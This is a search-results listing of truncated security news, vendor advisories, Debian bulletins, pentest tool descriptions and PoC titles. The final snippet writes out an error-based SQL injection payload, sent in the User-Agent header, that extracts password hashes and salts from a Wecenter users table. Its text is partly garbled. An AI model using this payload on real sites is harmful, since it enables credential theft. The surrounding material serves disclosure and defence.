7422 matches found
Simple Fingerprint Test is Enough to Know Cocaine Use
If you are one of those using cocaine, law enforcement officials may soon catch you by simply examining your fingerprints. Scientists have developed a new type of drug test that can tell whether you have taken cocaine by analyzing chemical traces left behind in your fingerprint. A team of...
Datapp Sniffs Out Unencrypted Mobile Data
Last fall, researchers at the University of New Haven’s Cyber Forensics Research and Education Group dropped the hammer on a number of Android apps, including those from some popular social networking and dating sites, for their insistence on sending data in the clear. Pretty quickly, the UNHcFRE...
[SECURITY] [DSA 3256-1] libtasn1-6 security update
Debian Security Advisory DSA-3256-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso May 10, 2015 http://www.debian.org/security/faq ...
DSA-3256-1 libtasn1-6 - security update
Bulletin has no description...
Autorize - Automatic Authorization Enforcement Detection (Extension for Burp Suite)
Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert at AppSec Labs. Autorize was designed to help security testers by performing automatic authorization tests. Installation 1. Download Burp...
SAP MII - Encryption Downgrade vulnerability
Application: SAP MII Vendor URL: http://www.sap.com Bugs: Cryptographic issues Reported: 05.09.2015 Vendor response: 06.09.2015 Date of Public Advisory: 20.11.2015 Reference: SAP Security Note 2240274 Author: Mathieu GELI ERPScan VULNERABILITY INFORMATION Class: Cryptographic issues Impact: readi...
[SECURITY] [DSA 3242-1] chromium-browser security update
Debian Security Advisory DSA-3242-1 [email protected] http://www.debian.org/security/ Michael Gilbert April 30, 2015 http://www.debian.org/security/faq ...
Web Application Security Scanner Framework: Arachni
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of modern web applications. It is free, with its source code public and available for review. It is multi-platform, supporting all major operating...
DSA-3242-1 chromium-browser - security update
Bulletin has no description...
DSA-3239-1 icecast2 - security update
Bulletin has no description...
i.FTP 2.21 - Overflow Crash (SEH) (PoC)
i.FTP 2.21 - Overflow Crash SEH PoC iFTP 2.21 SEH overwritten Crash PoC Author: Avinash Kumar Thapa "-Acid" Date of Testing : 28th April'2015 Vendor's home page: http://www.memecode.com/iftp.php Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe Crash Point: Go to Schedule Schedule...
UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC
Exploit for windows platform in category dos / poc Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC Author : Avinash Kumar Thapa "-Acid" Date of Testing : 25th April 2015 Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic Vendor Homepage: http://unipdf.com/ Software...
Ubuntu local elevation of privilege vulnerability disclosed, affecting versions 12.04 – 14.10 - bug warning - the black bar safety net
Today a local privilege elevation vulnerability affecting Ubuntu 12.04 - 14.10 was disclosed. The vulnerability was sent out by Google's Tavis Ormandy, together with an exploit test program. Vulnerability class: High-risk. Scope of impact: Ubuntu Precise 12.04 LTS, Ubuntu Trusty 14.04 LTS and Ubuntu...
SAP NetWeaver 7.4 - XXE
Application: SAP NetWeaver Portal 7.4 Vendor URL: http://www.sap.com Bugs: XML eXternal Entity Reported: 16.04.2015 Vendor response: 17.04.2015 Date of Public Advisory: 11.08.2015 Reference: SAP Security Note 2168485 Authors: Roman Bezhan ERPScan VULNERABILITY INFORMATION Class: XML External Enti...
OWASP ZAP 2.4.0 - Penetration Testing Tool for Testing Web Applications
ZAP is an OWASP Flagship project, and is currently the most active open source web application security tool. For a quick introduction to the new release see this video: Some of the most significant changes include: ‘Attack’ Mode A new ‘attack’ mode has been added that means that applications tha...
Cybrary Offers Free Online Ethical Hacking and Cyber Security Training
I frequently receive emails and messages on how to hack my friend’s Facebook account, how to become a hacker, how to penetrate networks, how to break into computers, and how to compromise routers? These are some of the most frequent queries I came across, and in this article I’ll attempt to answe...
Commix - Automated All-in-One OS Command Injection and Exploitation Tool
Commix (short for command injection exploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. By using this tool, ...
PHP arbitrary file upload vulnerability, CVE-2015-2348 analysis - vulnerability warning - the black bar safety net
Last night, security news broke of a “PHP arbitrary file upload vulnerability”, CVE number: CVE-2015-2348. At the time, the poster was about to pack up and go home and was surprised to see this news: the 0 character truncation upload vulnerability, lost for many years, and...
Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: FiyoCMS Multiple Vulnerabilities Date: 29 March 2015 Exploit Author: Mahendra Vendor Homepage: www.fiyo.org Software Link: http://sourceforge.net/projects/fiyo-cms/ Version: 2.0.1.8, other version might be vulnerable. Tested :...
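Wecenter latest version injection, part 2 (black-box testing techniques)
Brief description: injection that ignores GPC. Details: set the useragent; the injection statement is ' andselect 1 fromselect count,concatselect concatpassword,0x23,salt,0x23 from awsusers limit 0,1,floorrand02x from informationschema.tables group by xa Then leave the page open for a few minutes and visit any page again. You can see the error: Database error ------ SQL: UPDATE awsusersonline SET uid = '2', lastactive ...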